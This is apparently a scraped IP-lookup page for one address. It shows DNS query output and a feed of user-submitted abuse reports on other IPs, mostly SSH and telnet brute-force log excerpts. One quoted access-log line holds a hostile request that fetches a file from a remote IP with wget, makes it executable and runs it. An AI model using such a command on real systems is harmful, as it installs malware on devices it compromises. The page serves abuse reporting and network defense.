Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: United States

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 139.64.135.121
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 38355
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;139.64.135.121.			IN	A

;; AUTHORITY SECTION:
.			331	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022022601 1800 900 604800 86400

;; Query time: 61 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sun Feb 27 12:41:36 CST 2022
;; MSG SIZE  rcvd: 107
Host info
121.135.64.139.in-addr.arpa domain name pointer nazo.unelos.xyz.
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
121.135.64.139.in-addr.arpa	name = nazo.unelos.xyz.

Authoritative answers can be found from:
Related IP info:
Related comments:
IP Type Details Datetime
129.226.179.187 attack
Jan 21 01:43:18 vps691689 sshd[32726]: Failed password for root from 129.226.179.187 port 53624 ssh2
Jan 21 01:46:57 vps691689 sshd[364]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=129.226.179.187
...
2020-01-21 09:19:00
144.91.93.151 attackbots
Automatic report - SSH Brute-Force Attack
2020-01-21 13:01:44
92.60.12.100 attackspambots
Rule ID 	Rule Description 	Rule group 	Packets 	%
1 	20212 	SERVER-OTHER SSL CBC encryption mode weakness brute force attempt 	Malware 	134 	99.26
2020-01-21 09:02:38
183.2.196.100 attackbots
2019-10-14T14:18:56.492023suse-nuc sshd[32446]: Invalid user yuanwd from 183.2.196.100 port 51774
...
2020-01-21 09:16:10
183.195.157.138 attackbots
2020-01-01T13:14:27.507943suse-nuc sshd[22528]: Invalid user steve from 183.195.157.138 port 60732
...
2020-01-21 09:16:31
2.29.21.51 attackspam
2.29.21.51 - - [21/Jan/2020:01:08:34 +0400] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 552 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
2020-01-21 09:14:27
138.197.32.150 attack
5x Failed Password
2020-01-21 13:13:23
49.235.86.225 attack
Jan 21 06:09:12 meumeu sshd[20473]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.235.86.225 
Jan 21 06:09:14 meumeu sshd[20473]: Failed password for invalid user nacho from 49.235.86.225 port 42004 ssh2
Jan 21 06:12:27 meumeu sshd[20934]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=49.235.86.225 
...
2020-01-21 13:16:26
46.229.168.138 attackspam
Attacks websites by trying to access known vulnerables of plugins, brute-force of backends or probing of administrative tools
2020-01-21 13:08:00
183.159.242.27 attackbotsspam
2020-01-18T01:32:39.626953suse-nuc sshd[17766]: Invalid user !@#$%^ from 183.159.242.27 port 48311
...
2020-01-21 09:20:21
114.33.249.147 attackspambots
Unauthorized connection attempt detected from IP address 114.33.249.147 to port 23 [J]
2020-01-21 08:59:23
183.182.101.173 attack
2019-12-09T23:45:36.313726suse-nuc sshd[27028]: Invalid user Administrator from 183.182.101.173 port 49497
...
2020-01-21 09:17:14
222.186.30.31 attackbotsspam
Jan 21 05:54:55 markkoudstaal sshd[16843]: Failed password for root from 222.186.30.31 port 44667 ssh2
Jan 21 05:54:57 markkoudstaal sshd[16843]: Failed password for root from 222.186.30.31 port 44667 ssh2
Jan 21 05:55:00 markkoudstaal sshd[16843]: Failed password for root from 222.186.30.31 port 44667 ssh2
2020-01-21 13:17:05
183.253.21.30 attack
2019-09-23T06:24:45.787849suse-nuc sshd[21328]: Invalid user admin from 183.253.21.30 port 14030
...
2020-01-21 09:05:52
191.248.74.56 attackspambots
Telnet Server BruteForce Attack
2020-01-21 13:17:40

Recently Reported IPs

139.64.61.202 139.64.239.140 153.56.217.8 139.71.20.30
139.82.178.61 139.87.112.104 139.87.112.103 139.9.107.43
139.9.115.118 139.9.138.217 139.64.55.176 139.9.141.207
139.9.211.161 139.9.200.21 139.9.197.184 139.9.222.242
139.9.121.90 139.9.116.80 139.9.220.250 139.9.237.251